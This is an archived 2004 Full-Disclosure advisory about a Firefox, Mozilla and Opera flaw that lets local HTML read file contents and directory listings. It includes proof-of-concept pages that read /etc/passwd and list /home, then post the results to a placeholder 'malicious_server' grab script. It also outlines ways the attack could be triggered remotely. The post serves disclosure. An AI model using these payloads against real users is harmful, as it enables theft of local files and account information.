[Full-Disclosure] Disclosure of local file content in Mozilla Firefox and Opera

From: Giovanni Delvecchio (badpenguin79_at_hotmail.com)
Date: 12/06/04

  • Next message: Bart.Lansing_at_kohls.com: "Re: [Full-Disclosure] I'm calling for LycosEU heads and team to resign or be sacked" 
    To: full-disclosure@lists.netsys.com
Date: Mon, 06 Dec 2004 14:24:17 +0000

    Disclosure of local file content in Mozilla Firefox and Opera

    Note:
    I don't know if it could be considered really a security problem, anyway
    i'll try to explain my ideas.
    Sorry for my bad english.

    Author: Giovanni Delvecchio

    Applications affected:

    - Firefox 1.0
    - Mozilla 1.7
    - Opera 7.54 (*)

    ( maybe also previous versions )

    Tested versions:

    - Firefox 1.0 on Linux and Windows
    - Mozilla 1.7 on Windows
    - Opera 7.51,..7.54 on Linux

    Note:
    The content of the following text could be applied also to other browsers, i
    have checked just Mozilla, Firefox,Opera and Microsoft Internet Explorer.
    Microsoft Internet Explorer seems not to be affected.

    Description:
    ===========
    A possible problem exist in some browsers where a frame can gain access to
    attributes of another frame or iframe.

    An application of this "bug?" could be the possibility to disclose local
    directory structure.

    Moreover ther is is a possibility for a remote users to get the content of
    target users's local files.
    This can be achieved by using of the method .innerHTML , such method isn't
    standard but
    it's supported from the most broswers like Opera and Mozila Firefox.

    With Opera, i have noted that is possible read the content of local file
    just if they have *.htm or *.hml extension.

    PoC:
    ===
    The following PoCs are refered to linux versions of Firefox and Opera, but
    they can be applied also to Windows versions.

    Read a local file by inner.HTML method:

    --------------------------------------------------------
    <HTML>

    <BODY onLoad="ReadFileContent()" >

    <iframe name="local_file" src="file:///etc/passwd" height=0
    width=0></iframe>

    <form name="module" method="post" action="http://malicious_server/grab.php"
    ENCTYPE="text/plain">
    <input name="content" type="hidden" size="300" >
    </form>

    <script>

    function ReadFileContent(){

    alert(local_file.document.all(0).innerHTML);

    document.module.content.value+=local_file.document.all(0).innerHTML;
    //send content to malicious_server
    document.module.submit();
    }

    </script>

    </body>

    </html>

    (*) it works with Firefox with Opera it works just a file has .htm or html
    extension.
    -----------------------------------------------------------

    Enum /home directory structure:
    ----------------------------------------

    <html>

    <body onLoad="

      for(i=0;i<local_files.document.links.length;i++)
               
    {document.module.content.value+=local_files.document.links.item(i);}
      alert(document.module.content.value);
      //send list_files at malicious_server
      document.module.submit();

                  ">

    <form name="module" method="post" action="http://malicious_server/grab.php"
    ENCTYPE="text/plain">
    <input name="content" type="hidden" size="300" >
    </form>

    <iframe name="local_files" src="file:///home/" height=0
    width=0></iframe>

    </body>

    </html>
    -------------------------------------------

    Impact:
    ======
    A malicious server could :

    - obtain content of /home/ directory ( or c:\Document and Setting\ for
    windows system ) and so know a set of usernames present on system target.

    - know if a particolar program is installed on target system for a succesive
    attack.

    - Read confidential file content

    - Read browser's cache
    In opera it is located in ~/.opera/cache4, instead in Mozilla Firefox it's
    in /.mozilla/firefox/$RANDOM-STRING.default/Cache.
    Since is possible enum the directory structure , a malicious user could
    easily know the path to firefox's cache

    Anyway it cannot be exploited "directly" by a remote site, but only if the
    page is opened from a local path ( file://localpath/code.htm), since the
    iframe belongs to a local domain.

    Note: with Internet Explorer these PoCs doesn't work even in local.

    Possible method of remote exploitation:
    ================================

    Question:
    How could a malicious remote user exploit it ?

    My idea is the following:

    After that the user "victim" has required http://maliciuos_server/page.htm,
    if malicious_server responds with a page containing an unknown Content-Type
    field ( for example text/html. ,note the dot) ,the browser will show a
    dialog window with some options (open, save, cancel). Choosing "Open" to
    view this page, it will be downloaded and opened in local ; javascript code
    will be executed in local context.
    Obviously, if user chooses to save and after open it the result is equal.

    (*) For Opera this method of remote exploitation requires that opera must
    be setted as Default Application in "handler for saved files" whether the
    user choose "Open" in the dialog window.

    Another possible remote exploitation suggest by Lie Die Yu in response to a
    my message on bugtraq
    ( http://www.securityfocus.com/archive/1/382855/2004-11-30/2004-12-06/0 ) :

    "Ask target to open an HTML file in a remote SMBFS folder - expecting
    him to mount -t smbfs [...] /mnt/[...] and open "/mnt/[...].html" in Mozilla
    "

    Vendor notice
    ==============
    24th November 2004: I have contacted mozilla by security-at-mozilla.org
    and Opera by its bug track page at https://bugs.opera.com/wizard/

    No response from both at the moment.

    Solution
    ========
    - Disable Javascript

    Note: I have not checked, but seems that Firefox 1.0 RC1 is not affected.

    Best regards,

    Giovanni Delvecchio

    _________________________________________________________________
    Ricerche online più semplici e veloci con MSN Toolbar!
    http://toolbar.msn.it/

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

  • Next message: Bart.Lansing_at_kohls.com: "Re: [Full-Disclosure] I'm calling for LycosEU heads and team to resign or be sacked"

    Relevant Pages